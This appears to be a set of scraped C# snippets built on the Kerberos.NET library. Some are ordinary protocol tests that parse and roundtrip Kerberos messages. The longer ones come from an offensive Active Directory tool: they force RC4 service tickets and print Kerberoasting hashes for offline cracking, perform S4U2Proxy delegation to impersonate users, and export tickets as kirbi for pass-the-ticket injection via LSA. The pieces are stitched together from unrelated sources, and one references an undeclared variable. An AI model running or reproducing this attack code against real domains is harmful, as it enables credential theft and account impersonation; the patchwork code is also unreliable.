private void ProcessKdcProxy(KdcProxyMessage proxyMessage, string source) { var message = proxyMessage.UnwrapMessage(); var kdcBody = new { AsReq = TryDecode(message, m => KrbAsReq.DecodeApplication(m)), AsRep = TryDecode(message, m => KrbAsRep.DecodeApplication(m)), TgsReq = TryDecode(message, m => KrbTgsReq.DecodeApplication(m)), TgsRep = TryDecode(message, m => KrbTgsRep.DecodeApplication(m)), KrbError = TryDecode(message, m => KrbError.DecodeApplication(m)) }; if (kdcBody.AsReq != null) { ExplodeObject(kdcBody.AsReq, $"AS-REQ ({source})"); } else if (kdcBody.AsRep != null) { ExplodeObject(kdcBody.AsRep, $"AS-REP ({source})"); } else if (kdcBody.TgsReq != null) { ExplodeObject(kdcBody.TgsReq, $"TGS-REQ ({source})"); } else if (kdcBody.TgsRep != null) { ExplodeObject(kdcBody.TgsRep, $"TGS-REP ({source})"); } else if (kdcBody.KrbError != null) { ExplodeObject(kdcBody.KrbError, $"Krb-Error ({source})"); } }
private static KrbApReq GenerateApReq(RequestServiceTicket rst, out KrbAuthenticator authenticator) { var key = new KerberosKey(key: new byte[32], etype: EncryptionType.AES256_CTS_HMAC_SHA1_96); var now = DateTimeOffset.UtcNow; var notBefore = now.AddMinutes(-5); var notAfter = now.AddMinutes(55); var renewUntil = now.AddMinutes(555); var tgsRep = KrbTgsRep.GenerateServiceTicket <KrbTgsRep>(new ServiceTicketRequest { EncryptedPartKey = key, Principal = new FakeKerberosPrincipal("*****@*****.**"), ServicePrincipal = new FakeKerberosPrincipal("host/test.com"), ServicePrincipalKey = key, IncludePac = false, RealmName = "test.com", Now = now, StartTime = notBefore, EndTime = notAfter, RenewTill = renewUntil, Flags = TicketFlags.Renewable }); return(KrbApReq.CreateApReq(tgsRep, key, rst, out authenticator)); }
public void Message_TgsRepKrbTgtRenew() { var file = ReadDataFile("messages\\tgs-rep-testuser-krbtgt-renew"); var decoded = TestSimpleRoundtrip( "tgs-rep-testuser-krbtgt-renew", file.Skip(4).ToArray(), v => KrbTgsRep.DecodeApplication(v), t => t.EncodeApplication().ToArray() ); Assert.IsNotNull(decoded); }
public void Message_TgsRepS4uProxy() { var file = ReadDataFile("messages\\tgs-rep-app2-s4u-proxy"); var decoded = TestSimpleRoundtrip( "tgs-rep-app2-s4u-proxy", file.Skip(4).ToArray(), v => KrbTgsRep.DecodeApplication(v), t => t.EncodeApplication().ToArray() ); Assert.IsNotNull(decoded); }
public void KdcTgsReqHandler_Sync() { KrbAsRep asRep = RequestTgt(out KrbEncryptionKey tgtKey); Assert.IsNotNull(asRep); var tgsReq = KrbTgsReq.CreateTgsReq( new RequestServiceTicket { Realm = Realm, ServicePrincipalName = "host/foo." + Realm }, tgtKey, asRep, out KrbEncryptionKey sessionKey ); var handler = new KdcTgsReqMessageHandler(tgsReq.EncodeApplication(), new ListenerOptions { DefaultRealm = Realm, IsDebug = true, RealmLocator = realm => new FakeRealmService(realm) }); var results = handler.Execute(); var tgsRep = KrbTgsRep.DecodeApplication(results); Assert.IsNotNull(tgsRep); var encKdcRepPart = tgsRep.EncPart.Decrypt( sessionKey.AsKey(), KeyUsage.EncTgsRepPartSubSessionKey, d => KrbEncTgsRepPart.DecodeApplication(d) ); Assert.IsNotNull(encKdcRepPart); }
public void TestParseAllMessagesRoundtrip() { var allMessages = ReadDataFiles("messages\\"); foreach (var file in allMessages) { var key = file.Key.Substring(file.Key.LastIndexOf('\\') + 1); Debug.WriteLine(file.Value.HexDump()); switch (key) { case "as-rep": var asrep = TestSimpleRoundtrip( key, file.Value.Skip(4).ToArray(), v => new KrbAsRep().DecodeAsApplication(v), t => t.EncodeApplication().ToArray() ); break; case "as-req": TestSimpleRoundtrip( key, file.Value.Skip(4).ToArray(), v => KrbAsReq.DecodeApplication(v), t => t.EncodeApplication().ToArray()); break; case "as-req-preauth": TestSimpleRoundtrip( key, file.Value.Skip(4).ToArray(), v => KrbAsReq.DecodeApplication(v), t => t.EncodeApplication().ToArray()); break; case "krb-error-preauth-required": TestSimpleRoundtrip( key, file.Value.Skip(4).ToArray(), v => KrbError.DecodeApplication(v), t => t.EncodeApplication().ToArray()); break; case "tgs-rep-testuser-host-app03": TestSimpleRoundtrip( key, file.Value.Skip(4).ToArray(), v => KrbTgsRep.DecodeApplication(v), t => t.EncodeApplication().ToArray() ); break; case "tgs-rep-testuser-host-appservice": TestSimpleRoundtrip( key, file.Value.Skip(4).ToArray(), v => KrbTgsRep.DecodeApplication(v), t => t.EncodeApplication().ToArray() ); break; case "tgs-rep-testuser-krbtgt-renew": TestSimpleRoundtrip( key, file.Value.Skip(4).ToArray(), v => KrbTgsRep.DecodeApplication(v), t => t.EncodeApplication().ToArray() ); break; case "tgs-req-testuser-host-app03": var thing = TestSimpleRoundtrip( key, file.Value.Skip(4).ToArray(), v => KrbTgsReq.DecodeApplication(v), t => t.EncodeApplication().ToArray() ); break; case "tgs-req-testuser-host-appservice": TestSimpleRoundtrip( key, file.Value.Skip(4).ToArray(), v => KrbTgsReq.DecodeApplication(v), t => t.EncodeApplication().ToArray()); break; case "tgs-req-testuser-krbtgt-renew": TestSimpleRoundtrip( key, file.Value.Skip(4).ToArray(), v => KrbTgsReq.DecodeApplication(v), t => t.EncodeApplication().ToArray()); break; } } }
//TODO... //askTGS with TGT kirbi public static async System.Threading.Tasks.Task <TicketFlags> askTGS2(string kdc, ILoggerFactory logger, TcpKerberosTransport transport, KrbAsRep asRep, string username, string password, string domainName, string spn, bool isUnconstrained = false, bool outKirbi = false, bool verbose = false, bool kerberoast = false, bool ptt = false, string hash = null, EncryptionType etype = EncryptionType.RC4_HMAC_NT, bool outfile = false, string srvName = null, string tgsHash = null, EncryptionType tgsEtype = EncryptionType.AES256_CTS_HMAC_SHA1_96 ) { var now = DateTime.Now; credKey = password != null ? new KerberosPasswordCredential(username, password, domainName).CreateKey() : new Utils.KerberosHashCreds(username, hash, etype, domainName).CreateKey(); KrbEncAsRepPart asDecrypted = cred.DecryptKdcRep( asRep, KeyUsage.EncAsRepPart, d => KrbEncAsRepPart.DecodeApplication(d)); var sessionKey = asDecrypted.Key; //Request Service Ticket parameters ApOptions apOptions = ApOptions.Reserved; KdcOptions kdcOptions = KdcOptions.Forwardable | KdcOptions.Renewable | KdcOptions.RenewableOk | KdcOptions.Canonicalize; string s4u = null; KrbTicket s4uTicket = null; KrbTicket u2uServerTicket = null; if (isUnconstrained) { spn = $"krbtgt/{domainName}"; kdcOptions |= KdcOptions.Forwarded; } var rst = new RequestServiceTicket() { ServicePrincipalName = spn, ApOptions = apOptions, S4uTarget = s4u, S4uTicket = s4uTicket, UserToUserTicket = u2uServerTicket, KdcOptions = kdcOptions, Realm = domainName }; var sname = rst.ServicePrincipalName.Split('/', '@'); var tgt = asRep.Ticket; var additionalTickets = new List <KrbTicket>(); if (rst.KdcOptions.HasFlag(KdcOptions.EncTktInSkey) && rst.UserToUserTicket != null) { additionalTickets.Add(rst.UserToUserTicket); } if (!string.IsNullOrWhiteSpace(rst.S4uTarget)) { rst.KdcOptions |= KdcOptions.Forwardable; } if (rst.S4uTicket != null) { rst.KdcOptions |= KdcOptions.ConstrainedDelegation; additionalTickets.Add(rst.S4uTicket); } var body = new KrbKdcReqBody { //Specify RC4 as the only supported EType EType = new[] { EncryptionType.RC4_HMAC_NT },//KrbConstants.KerberosConstants.ETypes.ToArray(), KdcOptions = rst.KdcOptions, Nonce = KrbConstants.KerberosConstants.GetNonce(), Realm = rst.Realm, SName = new KrbPrincipalName() { Type = PrincipalNameType.NT_SRV_INST, Name = sname }, Till = KrbConstants.KerberosConstants.EndOfTime, CName = rst.CNameHint }; if (additionalTickets.Count > 0) { body.AdditionalTickets = additionalTickets.ToArray(); } var bodyChecksum = KrbChecksum.Create( body.Encode(), sessionKey.AsKey(), KeyUsage.PaTgsReqChecksum ); //ApReq //Authenticator var authenticator = new KrbAuthenticator { CName = asRep.CName, Realm = asRep.Ticket.Realm, SequenceNumber = KrbConstants.KerberosConstants.GetNonce(), Checksum = bodyChecksum, CTime = now, CuSec = now.Millisecond //new Random().Next(0, 999999) }; var subSessionKey = KrbEncryptionKey.Generate(sessionKey.EType); subSessionKey.Usage = KeyUsage.EncTgsRepPartSubSessionKey; authenticator.Subkey = subSessionKey; var encryptedAuthenticator = KrbEncryptedData.Encrypt( authenticator.EncodeApplication(), sessionKey.AsKey(), KeyUsage.PaTgsReqAuthenticator ); var apReq = new KrbApReq { Ticket = tgt, ApOptions = apOptions, Authenticator = encryptedAuthenticator }; var pacOptions = new KrbPaPacOptions { Flags = PacOptions.BranchAware }.Encode(); var paData = new List <KrbPaData>() { new KrbPaData { Type = PaDataType.PA_TGS_REQ, Value = apReq.EncodeApplication() }, new KrbPaData { Type = PaDataType.PA_PAC_OPTIONS, Value = pacOptions } }; if (!string.IsNullOrWhiteSpace(rst.S4uTarget)) { var paS4u = new KrbPaForUser { AuthPackage = "Kerberos", UserName = new KrbPrincipalName { Type = PrincipalNameType.NT_ENTERPRISE, Name = new[] { s4u } }, UserRealm = tgt.Realm }; paS4u.GenerateChecksum(subSessionKey.AsKey()); paData.Add(new KrbPaData { Type = PaDataType.PA_FOR_USER, Value = paS4u.Encode() }); } var tgs = new KrbTgsReq { PaData = paData.ToArray(), Body = body }; ReadOnlyMemory <byte> encodedTgs = tgs.EncodeApplication(); Console.WriteLine("[*] Sending TGS-REQ ..."); if (verbose) { PrintFunc.PrintReq(tgs, credKey, sessionKey.AsKey()); } CancellationToken cancellation = default; cancellation.ThrowIfCancellationRequested(); KrbTgsRep tgsRep = null; try { tgsRep = await transport.SendMessage <KrbTgsRep>( rst.Realm, encodedTgs, cancellation ); } catch (KerberosProtocolException pex) { Console.WriteLine("[x] Kerberos Error: {0}\n", pex.Message); Environment.Exit(0); } Console.WriteLine("[*] Receiving TGS-REP ..."); if (verbose) { PrintFunc.PrintRep(tgsRep, credKey); } var returnFlag = TicketFlags.Anonymous; try { //TGS-REP Enc-Part //https://github.com/dotnet/Kerberos.NET/blob/develop/Kerberos.NET/Entities/Krb/KrbTgsReq.cs#L144 KrbEncTgsRepPart tgsDecryptedRepPart = tgsRep.EncPart.Decrypt <KrbEncTgsRepPart>( subSessionKey.AsKey(), KeyUsage.EncTgsRepPartSubSessionKey, (ReadOnlyMemory <byte> t) => KrbEncTgsRepPart.DecodeApplication(t)); if (verbose) { Console.WriteLine(" * [Decrypted Enc-Part]:"); PrintFunc.PrintRepEnc(tgsDecryptedRepPart, credKey); returnFlag = tgsDecryptedRepPart.Flags; if (!string.IsNullOrEmpty(tgsHash)) { //========================================= //TGS Tiket Enc-Part //Service account Cred var kerbCred2 = new Utils.KerberosHashCreds(srvName, tgsHash, tgsEtype); //TGS-REQ Ticket Enc-Part KrbEncTicketPart ticketDecrypted = tgsRep.Ticket.EncryptedPart.Decrypt <KrbEncTicketPart> (kerbCred2.CreateKey(), KeyUsage.Ticket, (ReadOnlyMemory <byte> t) => KrbEncTicketPart.DecodeApplication(t)); Console.WriteLine(" * [Decrypted Ticket Enc-Part]:"); PrintFunc.PrintTicketEnc(ticketDecrypted); //========================================= } } if (outKirbi || outfile) { var kirbiTGS = Kirbi.toKirbi(tgsRep, tgsDecryptedRepPart, ptt); if (outKirbi) { Console.WriteLine("[+] TGS Kirbi:"); Console.WriteLine(" - {0}", Convert.ToBase64String(kirbiTGS)); } if (outfile) { Utils.Utils.WriteBytesToFile(Utils.Utils.MakeTicketFileName(username, sname), kirbiTGS); } } } catch (Exception e) { Console.WriteLine("[x] {0}", e.Message); } if (kerberoast) { //Kerberoasting var encType = (int)Enum.Parse(typeof(EncryptionType), tgsRep.Ticket.EncryptedPart.EType.ToString()); var myCipher = (BitConverter.ToString(tgsRep.Ticket.EncryptedPart.Cipher.ToArray())).Replace("-", ""); var kroasthash = String.Format("$krb5tgs${0}$*{1}${2}${3}*${4}${5}", encType, username, domainName, spn, myCipher.Substring(0, 32), myCipher.Substring(32)); Console.WriteLine("[+] Kerberoasting Hash: {0}", kroasthash); } return(returnFlag); }
//S4U2Proxy //[MS-SFU] 3.2.5.2.1.2 Using ServicesAllowedToSendForwardedTicketsTo //The KDC checks if the security principal name(SPN) for Service 2, //identified in the sname and srealm fields of the KRB_TGS_REQ message, //is in the Service 1 account's ServicesAllowedToSendForwardedTicketsTo parameter. //If it is, then the KDC replies with a service ticket for Service 2. //Otherwise the KDC MUST return `KRB-ERR-BADOPTION`. public static async System.Threading.Tasks.Task S4U2Proxy(string kdc, ILoggerFactory logger, TcpKerberosTransport transport, KrbAsRep asRep, KrbTgsRep s4u2self, string username, string password, string domainName, string impersonateuser, string spn, bool outKirbi = false, bool verbose = false, bool ptt = false, string hash = null, EncryptionType etype = EncryptionType.RC4_HMAC_NT) { var now = DateTime.UtcNow; credKey = password != null ? new KerberosPasswordCredential(username, password, domainName).CreateKey() : new Utils.KerberosHashCreds(username, hash, etype, domainName).CreateKey(); KrbEncAsRepPart asDecrypted = password != null ? new KerberosPasswordCredential(username, password, domainName).DecryptKdcRep( asRep, KeyUsage.EncAsRepPart, d => KrbEncAsRepPart.DecodeApplication(d)) : new Utils.KerberosHashCreds(username, hash, etype, domainName).DecryptKdcRep( asRep, KeyUsage.EncAsRepPart, d => KrbEncAsRepPart.DecodeApplication(d)); var sessionKey = asDecrypted.Key; //Request Service Ticket parameters ApOptions apOptions = ApOptions.Reserved; KdcOptions kdcOptions = KdcOptions.Forwardable | KdcOptions.Renewable | KdcOptions.RenewableOk; string s4u = null; KrbTicket s4uTicket = s4u2self.Ticket; KrbTicket u2uServerTicket = null; var rst = new RequestServiceTicket() { ServicePrincipalName = spn, ApOptions = apOptions, S4uTarget = s4u, S4uTicket = s4uTicket, UserToUserTicket = u2uServerTicket, KdcOptions = kdcOptions, Realm = domainName }; var sname = rst.ServicePrincipalName.Split('/', '@'); var tgt = asRep.Ticket; var additionalTickets = new List <KrbTicket>(); if (rst.KdcOptions.HasFlag(KdcOptions.EncTktInSkey) && rst.UserToUserTicket != null) { additionalTickets.Add(rst.UserToUserTicket); } if (!string.IsNullOrWhiteSpace(rst.S4uTarget)) { rst.KdcOptions |= KdcOptions.Forwardable; } if (rst.S4uTicket != null) { rst.KdcOptions = rst.KdcOptions | KdcOptions.ConstrainedDelegation | KdcOptions.CNameInAdditionalTicket; additionalTickets.Add(rst.S4uTicket); } //EncryptionType[] kdcReqEtype = { EncryptionType.RC4_HMAC_NT }; string[] name = { }; var body = new KrbKdcReqBody { EType = KrbConstants.KerberosConstants.ETypes.ToArray(), KdcOptions = rst.KdcOptions, Nonce = KrbConstants.KerberosConstants.GetNonce(), Realm = rst.Realm, SName = new KrbPrincipalName() { Type = PrincipalNameType.NT_SRV_INST, Name = sname }, Till = KrbConstants.KerberosConstants.EndOfTime, CName = new KrbPrincipalName() { Type = PrincipalNameType.NT_SRV_INST, Name = name }, }; if (additionalTickets.Count > 0) { body.AdditionalTickets = additionalTickets.ToArray(); } var bodyChecksum = KrbChecksum.Create( body.Encode(), sessionKey.AsKey(), KeyUsage.PaTgsReqChecksum ); //ApReq //Authenticator var authenticator = new KrbAuthenticator { CName = asRep.CName, Realm = asRep.Ticket.Realm, SequenceNumber = KrbConstants.KerberosConstants.GetNonce(), Checksum = bodyChecksum, CTime = now, CuSec = now.Millisecond //new Random().Next(0, 999999) }; var subSessionKey = KrbEncryptionKey.Generate(sessionKey.EType); subSessionKey.Usage = KeyUsage.EncTgsRepPartSubSessionKey; authenticator.Subkey = subSessionKey; var encryptedAuthenticator = KrbEncryptedData.Encrypt( authenticator.EncodeApplication(), sessionKey.AsKey(), KeyUsage.PaTgsReqAuthenticator ); var apReq = new KrbApReq { Ticket = tgt, ApOptions = apOptions, Authenticator = encryptedAuthenticator }; var pacOptions = new KrbPaPacOptions { Flags = PacOptions.ResourceBasedConstrainedDelegation }.Encode(); var paData = new List <KrbPaData>() { new KrbPaData { Type = PaDataType.PA_TGS_REQ, Value = apReq.EncodeApplication() }, new KrbPaData { Type = PaDataType.PA_PAC_OPTIONS, Value = pacOptions } }; if (!string.IsNullOrWhiteSpace(rst.S4uTarget)) { var paS4u = new KrbPaForUser { AuthPackage = "Kerberos", UserName = new KrbPrincipalName { Type = PrincipalNameType.NT_ENTERPRISE, Name = new[] { s4u } }, UserRealm = tgt.Realm }; paS4u.GenerateChecksum(subSessionKey.AsKey()); paData.Add(new KrbPaData { Type = PaDataType.PA_FOR_USER, Value = paS4u.Encode() }); } var tgs = new KrbTgsReq { PaData = paData.ToArray(), Body = body }; ReadOnlyMemory <byte> encodedTgs = tgs.EncodeApplication(); Console.WriteLine("[*] Sending TGS-REQ [S4U2Proxy] ..."); if (verbose) { PrintFunc.PrintReq(tgs, credKey, sessionKey.AsKey()); } CancellationToken cancellation = default; cancellation.ThrowIfCancellationRequested(); KrbTgsRep tgsRep = null; try { tgsRep = await transport.SendMessage <KrbTgsRep>( rst.Realm, encodedTgs, cancellation ); } catch (KerberosProtocolException pex) { Console.WriteLine("[x] Kerberos Error: {0}", pex.Message); Environment.Exit(0); } Console.WriteLine("[*] Receiving TGS-REP [S4U2Proxy] ..."); try { KrbEncTgsRepPart tgsDecryptedRepPart = tgsRep.EncPart.Decrypt <KrbEncTgsRepPart>( subSessionKey.AsKey(), KeyUsage.EncTgsRepPartSubSessionKey, (ReadOnlyMemory <byte> t) => KrbEncTgsRepPart.DecodeApplication(t)); if (verbose) { PrintFunc.PrintRep(tgsRep, credKey); Console.WriteLine(" * [Decrypted Enc-Part]:"); PrintFunc.PrintRepEnc(tgsDecryptedRepPart, credKey); } if (outKirbi) { var kirbiTGS = Kirbi.toKirbi(tgsRep, tgsDecryptedRepPart, ptt); Console.WriteLine("[+] TGS Kirbi:"); Console.WriteLine(" - {0}", Convert.ToBase64String(kirbiTGS)); } }catch (Exception e) { Console.WriteLine("[x] {0}", e.Message); } }
//FROM TGS_REP public static byte[] toKirbi(KrbTgsRep tgsRep, KrbEncTgsRepPart tgsDecryptedRepPart, bool ptt = false) { //KrbCredInfo::= SEQUENCE { // key[0] EncryptionKey, //prealm[1] Realm OPTIONAL, //pname[2] PrincipalName OPTIONAL, //flags[3] TicketFlags OPTIONAL, //authtime[4] KerberosTime OPTIONAL, //starttime[5] KerberosTime OPTIONAL, //endtime[6] KerberosTime OPTIONAL //renew - till[7] KerberosTime OPTIONAL, //srealm[8] Realm OPTIONAL, //sname[9] PrincipalName OPTIONAL, //caddr[10] HostAddresses OPTIONAL //} var info = new KrbCredInfo() { Key = tgsDecryptedRepPart.Key, Realm = tgsDecryptedRepPart.Realm, PName = tgsRep.CName, Flags = tgsDecryptedRepPart.Flags, StartTime = tgsDecryptedRepPart.StartTime, EndTime = tgsDecryptedRepPart.EndTime, RenewTill = tgsDecryptedRepPart.RenewTill, SRealm = tgsDecryptedRepPart.Realm, SName = tgsDecryptedRepPart.SName }; //EncKrbCredPart ::= [APPLICATION 29] SEQUENCE { //ticket-info[0] SEQUENCE OF KrbCredInfo, //nonce[1] INTEGER OPTIONAL, //timestamp[2] KerberosTime OPTIONAL, //usec[3] INTEGER OPTIONAL, //s-address[4] HostAddress OPTIONAL, //r-address[5] HostAddress OPTIONAL //} KrbCredInfo[] infos = { info }; var encCredPart = new KrbEncKrbCredPart() { TicketInfo = infos }; //KRB-CRED ::= [APPLICATION 22] SEQUENCE { //pvno[0] INTEGER, //msg - type[1] INTEGER, --KRB_CRED //tickets[2] SEQUENCE OF Ticket, //enc - part[3] EncryptedData //} var myCred = new KrbCred(); myCred.ProtocolVersionNumber = 5; myCred.MessageType = MessageType.KRB_CRED; KrbTicket[] tickets = { tgsRep.Ticket }; myCred.Tickets = tickets; var encryptedData = new KrbEncryptedData() { Cipher = encCredPart.EncodeApplication(), }; myCred.EncryptedPart = encryptedData; byte[] kirbiBytes = myCred.EncodeApplication().ToArray(); string kirbiString = Convert.ToBase64String(kirbiBytes); if (ptt) { LSA.ImportTicket(kirbiBytes, new LUID()); } return(kirbiBytes); }